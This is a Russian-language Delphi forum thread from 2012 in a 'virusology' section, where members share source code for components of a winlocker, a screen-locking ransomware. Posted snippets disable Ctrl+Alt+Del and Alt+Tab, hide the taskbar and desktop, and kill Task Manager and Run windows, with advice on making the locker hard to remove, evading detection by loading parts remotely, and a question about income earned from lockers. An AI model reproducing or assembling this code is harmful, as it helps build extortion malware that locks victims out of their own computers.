Вторник, 26.09.2017, 05:05 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx 
delfcode » Delphi » Вирусология Delphi » Компоненты winlocker'а (Исходные коды)
Компоненты winlocker'а
alex0097Дата: Четверг, 11.10.2012, 11:26 | Сообщение # 1
Частый гость
Зарегистрирован: 11.07.2010
Группа: Пользователи
Сообщений: 51
Статус: Offline
Чет сейчас начал писать его... И к сожалению неудачно. Работает на ХР а вот на 7 х64 не робит.

Code
//Отключаем ALT+CTRL+DEl ALT+TAB CTRL+ESC
   SystemParametersInfo(SPI_SCREENSAVERRUNNING,1,0,0);
//Убираем Панель задач
   hTaskbar := FindWindow('Shell_TrayWnd', Nil);
   ShowWindow(hTaskBar, SW_HIDE);
//Убираем Иконки с рабочего стола
   ShowWindow(FindWindow(nil,'Program Manager'),SW_HIDE);


Вот только на 7. работает ALT+CTRL+DEl ALT+TAB CTRL+ESC кто что скажет?
 
alex0097Дата: Воскресенье, 14.10.2012, 10:24 | Сообщение # 2
Частый гость
Зарегистрирован: 11.07.2010
Группа: Пользователи
Сообщений: 51
Статус: Offline
Code
var
  tit:HWND;
begin
  tit:=FindWindow(nil, 'Диспетчер задач Windows');
  if (tit>0) then
  PostMessage(tit, WM_QUIT, 1, 0);
  tit:=FindWindow(nil, 'Запуск программы');
  if (tit>0) then
  PostMessage(tit, WM_QUIT, 1, 0);
  tit:=FindWindow(nil, 'Мой компьютер');
  if (tit>0) then
  PostMessage(tit, WM_QUIT, 1, 0);


вот так хорошо работает на Windows 7 x32 и x64. Может будет кому полезно)
 
xXxSh@dowxXxДата: Воскресенье, 14.10.2012, 10:47 | Сообщение # 3
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
Quote (alex0097)
вот так хорошо работает на Windows 7 x32 и x64


я так понимаю что этот код не работает на Win XP ?
а на Vista не проверяли, какой из этих вариантов там будет работать, видимо если работает на Win7 то и на Vista должно?


Сообщение отредактировал xXxSh@dowxXx - Воскресенье, 14.10.2012, 10:49
 
alex0097Дата: Воскресенье, 14.10.2012, 11:27 | Сообщение # 4
Частый гость
Зарегистрирован: 11.07.2010
Группа: Пользователи
Сообщений: 51
Статус: Offline
xXxSh@dowxXx, проверял на висте ультимейте. Ну у меня в локере эти 2 функции включены. на ХР проверял. Работает 1ый код.... вообщем это как подстраховка.... Удалить практически не возможно его. Только если каким нить Kaspersky WindowsUnlocker.

Вставляй 2 кода не ошибешься)


Сообщение отредактировал alex0097 - Воскресенье, 14.10.2012, 11:31
 
xXxSh@dowxXxДата: Воскресенье, 14.10.2012, 17:33 | Сообщение # 5
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
Quote (alex0097)
Вставляй 2 кода не ошибешься)


Хехе, более красиво будет сделать проверку на ОС, если ХР то выполняем этот код, а если Vista\Win7 то другой.
 
alex0097Дата: Воскресенье, 14.10.2012, 21:34 | Сообщение # 6
Частый гость
Зарегистрирован: 11.07.2010
Группа: Пользователи
Сообщений: 51
Статус: Offline
xXxSh@dowxXx, ну кому как)))
 
BornДата: Среда, 17.10.2012, 20:45 | Сообщение # 7
Частый гость
Зарегистрирован: 01.10.2012
Группа: Пользователи
Сообщений: 49
Статус: Offline
A как осуществить проверку,ну например если вынь 7 то запускаем прогу если не вынь 7,то не запускаем.
 
Don_DiegoДата: Среда, 17.10.2012, 21:54 | Сообщение # 8
Продвинутый
Зарегистрирован: 16.04.2012
Группа: Пользователи
Сообщений: 251
Статус: Offline
Code
function TForm1.VersionOS: Boolean;
var
     VersionInfo : TOSVersionInfo;
begin
     VersionInfo.dwOSVersionInfoSize := SizeOf( TOSVersionInfo );
     if Windows.GetVersionEx( VersionInfo ) then
        begin
           with VersionInfo do
           begin
              Label3.Caption:=IntToStr(dwMajorVersion) + '.' + IntToStr(dwMinorVersion);
              Label5.Caption:=IntToStr(dwBuildNumber);
              Label7.Caption:=szCSDVersion;
              Result:=True;
           end;
        end
     else
        Result:= False;
end;

procedure TForm1.FormCreate(Sender: TObject);
begin;
if VersionOS then
    if Label3.Caption = '4.10' then
      Label1.Caption:='Windows 98'
    else if Label3.Caption = '5.0' then
      Label1.Caption:='Windows 2000'
    else if Label3.Caption = '4.90' then
      Label1.Caption:='Windows ME'
    else if Label3.Caption = '5.1' then
      Label1.Caption:='Windows XP'
    else if Label3.Caption = '5.2' then
      Label1.Caption:='Windows XP 64-bit Edition'
    else if Label3.Caption = '6.0' then
      Label1.Caption:='Windows Vista'
    else if Label3.Caption = '6.1' then
      Label1.Caption:='Windows 7'
    else
      Label1.Caption:='Неизвестная ОС';
end;


Заходим на:
http://ru.wikipedia.org/wiki/Windows#.D0.92.D0.B5.D1.80.D1.81.D0.B8.D0.B8_Microsoft_Windows
И там смотрим весь список версий. . .
Прикрепления: OS.rar(9Kb)


Сообщение отредактировал Don_Diego - Среда, 17.10.2012, 21:58
 
alex0097Дата: Среда, 17.10.2012, 22:17 | Сообщение # 9
Частый гость
Зарегистрирован: 11.07.2010
Группа: Пользователи
Сообщений: 51
Статус: Offline
Don_Diego, хм..... ДА но есть 1 особенность не распознает х64. Надо думать.. Но спасибо за инфу)
У меня при сжатии локер весит 4кв... Спросите как, подгруз остальных компонентов :DDD так надежней что не спалят.
У кого сколько весит? И у кого какой доход с них?
 
Don_DiegoДата: Среда, 17.10.2012, 23:52 | Сообщение # 10
Продвинутый
Зарегистрирован: 16.04.2012
Группа: Пользователи
Сообщений: 251
Статус: Offline
Quote (alex0097)
И у кого какой доход с них?

Большинству людей на этом форуме это не нужно. Просто рассматриваются разные подходы в написании вирусов, новые методы внедрения, исправления ошибок и т.д. Применяют крайне редко.
 
dolphinДата: Четверг, 18.10.2012, 00:40 | Сообщение # 11
Администратор
Сообщений: 902
Статус: Offline
Как определить какая Windows 32 или 64-разрядная

Можно вызвать IsWow64Process (из kernel32.dll)

BOOL IsWow64Process(
HANDLE hProcess,
PBOOL Wow64Process );

Для 32-х разрядного процесса в 64-х разрядной ОС будет установлена TRUE во втором параметре, для систем ниже WinXP (где нет смысла выяснять 64-х разрядность) будет ошибка ERROR_CALL_NOT_IMPLEMENTED
 
xXxSh@dowxXxДата: Четверг, 18.10.2012, 14:14 | Сообщение # 12
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
ОФФ ТОП:


Сообщение отредактировал xXxSh@dowxXx - Четверг, 18.10.2012, 14:15
 
alex0097Дата: Четверг, 18.10.2012, 19:54 | Сообщение # 13
Частый гость
Зарегистрирован: 11.07.2010
Группа: Пользователи
Сообщений: 51
Статус: Offline


Сообщение отредактировал dolphin - Четверг, 18.10.2012, 20:35
 
delfcode » Delphi » Вирусология Delphi » Компоненты winlocker'а (Исходные коды)
Страница 1 из 11
Поиск:

delfcode.ru © 2008 - 2017 Хостинг от uCoz